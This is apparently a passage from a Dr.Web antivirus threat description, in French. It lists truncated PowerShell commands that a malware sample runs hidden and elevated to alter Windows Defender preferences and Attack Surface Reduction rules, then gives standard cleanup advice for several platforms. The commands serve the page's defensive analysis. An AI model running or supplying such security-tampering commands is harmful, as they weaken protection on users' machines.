  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 -AttackSurfaceReductionRules...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 92e97fa1-2edf-4476-bdd6-9dd0b4dddc7b -AttackSurfaceReductionRules...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids d1e49aac-8f56-4280-b9ba-993a6d77406c -AttackSurfaceReductionRules...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids e6db77e5-3df2-4cf1-b95a-636979351e5b -AttackSurfaceReductionRules...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids 75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84 -AttackSurfaceReductionRules...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Add-MpPreference -AttackSurfaceReductionRules_Ids d3e037e1-3eb8-44c8-a917-57927947596d -AttackSurfaceReductionRules...
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Start-Process powershell -Wait -ArgumentList '-WindowStyle Hidden Set-MpPreference -EnableLowCpuPriority 0 ' -WindowStyle Hidden -Verb RunAs"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Set-MpPreference -ScanParameters 1

Recommandations pour le traitement

  1. Si le système d'exploitation peut être démarré (en mode normal ou en mode sans échec), téléchargez Dr.Web Security Space et lancez un scan complet de votre ordinateur et de tous les supports amovibles que vous utilisez. En savoir plus sur Dr.Web Security Space.
  2. Si le démarrage du système d'exploitation est impossible, veuillez modifier les paramètres du BIOS de votre ordinateur pour démarrer votre ordinateur via CD/DVD ou clé USB. Téléchargez l'image du disque de secours de restauration du système Dr.Web® LiveDisk ou l'utilitaire pour enregistrer Dr.Web® LiveDisk sur une clé USB, puis préparez la clé USB appropriée. Démarrez l'ordinateur à l'aide de cette clé et lancez le scan complet et le traitement des menaces détectées.

Veuillez lancer le scan complet du système à l'aide de Dr.Web Antivirus pour Mac OS.

Veuillez lancer le scan complet de toutes les partitions du disque à l'aide de Dr.Web Antivirus pour Linux.

  1. Si votre appareil mobile fonctionne correctement, veuillez télécharger et installer sur votre appareil mobile Dr.Web pour Android. Lancez un scan complet et suivez les recommandations sur la neutralisation des menaces détectées.
  2. Si l'appareil mobile est bloqué par le Trojan de la famille Android.Locker (un message sur la violation grave de la loi ou la demande d'une rançon est affiché sur l'écran de l'appareil mobile), procédez comme suit:
    • démarrez votre Smartphone ou votre tablette en mode sans échec (si vous ne savez pas comment faire, consultez la documentation de l'appareil mobile ou contactez le fabricant) ;
    • puis téléchargez et installez sur votre appareil mobile Dr.Web pour Android et lancez un scan complet puis suivez les recommandations sur la neutralisation des menaces détectées ;
    • Débranchez votre appareil et rebranchez-le.

En savoir plus sur Dr.Web pour Android